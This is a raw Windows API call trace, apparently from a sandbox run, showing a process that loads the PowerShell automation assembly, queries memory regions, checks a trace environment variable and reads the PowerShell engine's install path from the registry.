	[0171.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.220] GetLastError () returned 0xcb
	[0171.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.220] GetLastError () returned 0xcb
	[0171.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.220] GetLastError () returned 0xcb
	[0171.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.220] GetLastError () returned 0xcb
	[0171.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.221] GetLastError () returned 0xcb
	[0171.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.221] GetLastError () returned 0xcb
	[0171.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.221] GetLastError () returned 0xcb
	[0171.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.221] GetLastError () returned 0xcb
	[0171.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.221] GetLastError () returned 0xcb
	[0171.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.221] GetLastError () returned 0xcb
	[0171.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.221] GetLastError () returned 0xcb
	[0171.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.342] GetLastError () returned 0xcb
	[0171.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d654, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.342] GetLastError () returned 0xcb
	[0171.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d654, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.342] GetLastError () returned 0xcb
	[0171.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d654, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.342] GetLastError () returned 0xcb
	[0171.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.537] GetLastError () returned 0xcb
	[0171.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d654, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.537] GetLastError () returned 0xcb
	[0171.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d654, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.537] GetLastError () returned 0xcb
	[0171.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.537] GetLastError () returned 0xcb
	[0171.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d654, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.537] GetLastError () returned 0xcb
	[0171.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d654, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.537] GetLastError () returned 0xcb
	[0171.537] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0171.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.539] GetLastError () returned 0xcb
	[0171.658] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0171.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.941] GetLastError () returned 0xcb
	[0171.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.946] GetLastError () returned 0xcb
	[0171.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.949] GetLastError () returned 0xcb
	[0172.042] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0172.044] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0173.645] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0173.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0173.756] GetLastError () returned 0xcb
	[0175.577] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x71a1d8
	[0175.577] GetLastError () returned 0x0
	[0175.579] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x71a260
	[0175.579] GetLastError () returned 0x0
	[0177.604] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.732] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.733] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.734] VirtualQuery (in: lpAddress=0x14c284, lpBuffer=0x14d284, dwLength=0x1c | out: lpBuffer=0x14d284*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.337] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.338] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.338] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.338] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.338] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.338] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.338] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.338] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.339] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.339] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.339] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.339] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.339] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.339] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.339] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.339] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.340] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.340] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.340] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.340] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.340] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.341] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.341] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.341] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.341] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.341] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.341] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.342] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.342] VirtualQuery (in: lpAddress=0x14cbd0, lpBuffer=0x14dbd0, dwLength=0x1c | out: lpBuffer=0x14dbd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.490] GetLastError () returned 0xcb
	[0178.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.490] GetLastError () returned 0xcb
	[0178.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.491] GetLastError () returned 0xcb
	[0178.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.491] GetLastError () returned 0xcb
	[0178.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.606] GetLastError () returned 0xcb
	[0178.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.606] GetLastError () returned 0xcb
	[0178.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.606] GetLastError () returned 0xcb
	[0178.606] VirtualQuery (in: lpAddress=0x14cef8, lpBuffer=0x14def8, dwLength=0x1c | out: lpBuffer=0x14def8*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.608] GetLastError () returned 0xcb
	[0178.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.608] GetLastError () returned 0xcb
	[0178.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.608] GetLastError () returned 0xcb
	[0178.608] VirtualQuery (in: lpAddress=0x14cef0, lpBuffer=0x14def0, dwLength=0x1c | out: lpBuffer=0x14def0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.608] VirtualQuery (in: lpAddress=0x14cba4, lpBuffer=0x14dba4, dwLength=0x1c | out: lpBuffer=0x14dba4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.608] VirtualQuery (in: lpAddress=0x14cba4, lpBuffer=0x14dba4, dwLength=0x1c | out: lpBuffer=0x14dba4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.611] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e62c | out: phkResult=0x14e62c*=0x300) returned 0x0
	[0178.611] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e674, lpData=0x0, lpcbData=0x14e670*=0x0 | out: lpType=0x14e674*=0x1, lpData=0x0, lpcbData=0x14e670*=0x56) returned 0x0
	[0178.611] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e674, lpData=0x721bd8, lpcbData=0x14e670*=0x56 | out: lpType=0x14e674*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e670*=0x56) returned 0x0
